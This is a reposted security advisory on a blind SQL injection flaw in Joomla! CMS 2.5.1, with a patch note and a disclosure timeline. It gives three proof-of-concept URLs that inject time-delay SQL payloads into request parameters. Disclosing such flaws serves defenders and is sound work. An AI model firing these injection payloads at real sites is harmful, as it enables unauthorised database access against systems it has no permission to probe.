Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.
Stratsec vulnerability researcher, Sow Ching Shiong has discovered Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Other earlier versions may also be affected.
Proof of concept URLs which will cause a time delay of 30 seconds are provided below:
- http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
- http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
- http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
Solution
Update to version 2.5.2 or later.
References
Vendor URL: http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html
Stratsec: http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)
Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.